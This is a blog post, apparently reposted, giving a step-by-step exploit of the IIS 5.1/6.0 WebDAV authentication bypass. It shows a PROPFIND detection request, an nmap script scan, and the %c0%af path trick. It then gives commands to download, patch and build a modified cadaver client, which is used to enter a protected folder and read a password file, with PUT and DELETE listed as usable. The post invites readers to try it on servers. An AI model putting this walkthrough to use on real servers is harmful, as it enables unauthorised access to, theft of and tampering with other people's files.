Mar 26, 2011

___The webDAV___

6:34 AM  s4ur4v  No comments

 

webDAV also known as Web-based Distributed Authoring and Versioning is a set of methods based on the Hypertext Transfer Protocol (HTTP) that facilitates collaboration between users in editing and managing documents and files stored on World Wide Web servers.For more info go here

Detection , Vulnerability checking and Exploitation

The first thing one should know about this vulnerability is that the IIS server is not exploitable if the root folder is protected. Also if the root folder is protected, there is no way to determine if WebDAV is even enabled. That being said, if the root folder is= not= protected then it’s time to break out the server and have some fun.

Detecting if WebDAV is enabled

Tested on 


►IIS 6.0/Windows 2003 Enterprise SP2
►IIS 5.1/Windows XP Pro SP2
►IIS 5.0/Windows 2000 SP4

note-On IIS 6.0, WebDAV is disabled by default. On IIS 5.0 and 5.1, WebDAV is enabled by default and you must edit the registry to disable it.

the method of detection simply involves running a PROPFIND request on the server. This is the same basic PROPFIND request we used in the http-iis-webdav-vuln.nse script: 

PROPFIND / HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Type: application/xml
Content-Length: 298

<?xml version="1.0" encoding="utf-8"?>
<propfind xmlns="DAV:">
<prop>
<getcontentlength xmlns="DAV:"/>
<getlastmodified xmlns="DAV:"/>
<executable xmlns="http://apache.org/dav/props/"/>
<resourcetype xmlns="DAV:"/>
<checked-in xmlns="DAV:"/>
<checked-out xmlns="DAV:"/>
</prop>
</propfind>

If webDAV is enabled it will return something like this “HTTP/1.1 207 Multi-Status”

if webDAV has been disabled, it will return “HTTP/1.1 501 Not Supported”

Checking if a server is vulnerable

tested on (working)

► IIS 6.0/Windows 2003 Enterprise SP2
► IIS 5.1/Windows XP Pro SP2

Tested On (not working) 

►IIS 5.0/Windows 2000 SP4

The original script only used one type of check; it would first find a protected folder (/secret/) and then try inserting the % c 0 % a f(widout space) character after the first /. It would turn /secret/ into                   / % c 0  % a f secret/. (widout space)

This works fine on IIS 6.0 but  not work at all on IIS 5.0/5.1.  The trick with 5.1 is that the % c 0 % a f character can not be right after the / but must be somewhere in the middle of the folder name. This also works on IIS 6.0. I modified the script so that it uses the 5.1/6.0 check, turning /secret/ into                         / s % c 0 % a f secret/. 

 Finding a vulnerable server

First thing we need to do is find a vulnerable server Lets see how an nmap scan of abox with the updated script that works  

> ./nmap -T4 -p80 --script=http-iis-webdav-vuln xxx.xxx.xxx.xxx

Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-05-20 14:29 CDT
Interesting ports on xxx.xxx.xxx.xxx:
PORT   STATE SERVICE
80/tcp open  http
|_ http-iis-webdav-vuln: WebDAV is ENABLED. Vulnerable folders discovered: /private, /secret, /webdav

Nmap done: 1 IP address (1 host up) scanned in 21.41 seconds
We found webDAV is enabled and there are 3 vuln folders 

 

Exploiting it...!

Now just telnet the host over port 80.... Some more fun to have we will use a webDAV client cadaver

The nice thing about it is that it’s open,  the cadaver-0.23.2 source and after hacking away at it for awhile,  there is a little patch that makes it quite easy to exploit a server. Check the patch itself for the gritty details but basically it does the following:

1) Replace any “Depth: 0″ header with “Depth: 1″ (otherwise ls won’t work)
2) Append the header “Translate: f” to every request (otherwise get and probably others won’t work)
3) Insert the characters “%c0%af” into any uri request longer than 1 character.

get the cadaver-0.23.2-h4x.patch and apply it to the cadaver-0.23.2 source from the cadaver website. Here’s the commands: 
> mkdir cadaver-h4x
> cd cadaver-h4x
> wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
--snip--
> wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz
--snip--
> tar xzvf cadaver-0.23.2.tar.gz
--snip--
> cd cadaver-0.23.2/
> patch -p1 < ../cadaver-0.23.2-h4x.patch
patching file lib/neon/ne_basic.c
patching file lib/neon/ne_request.c
patching file lib/neon/ne_uri.c
> ./configure
--snip--
> make
--snip--

 Now we should have a patched, compiled version of cadaver, so start it up with the server that was identified as having a vulnerable folder earlier:

 

> ./cadaver xxx.xxx.xxx.xxx

This should drop you to a “dav:/>” prompt. Now just cd into the vulnerable folder and check out what’s there:

dav:/> cd secret
dav:/secret/> ls
Listing collection `/secret/': succeeded.
        password.txt                           7  May 19 10:40
dav:/secret/> cat password.txt
Displaying `/secret/password.txt':
ron$pr0ns
dav:/secret/>

You got it now :D
Here’s a list of commands  that work with the patched cadaver on a vulnerable folder:

* CD
* LS
* MOVE
* PUT
* GET
* CAT
* DELETE



If you exploited a IIS server let me know ;)

I am not the writer of this tutorial this is only edited by me 


Happy Hacking


 

Posted in:

0 comments:

Post a Comment

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More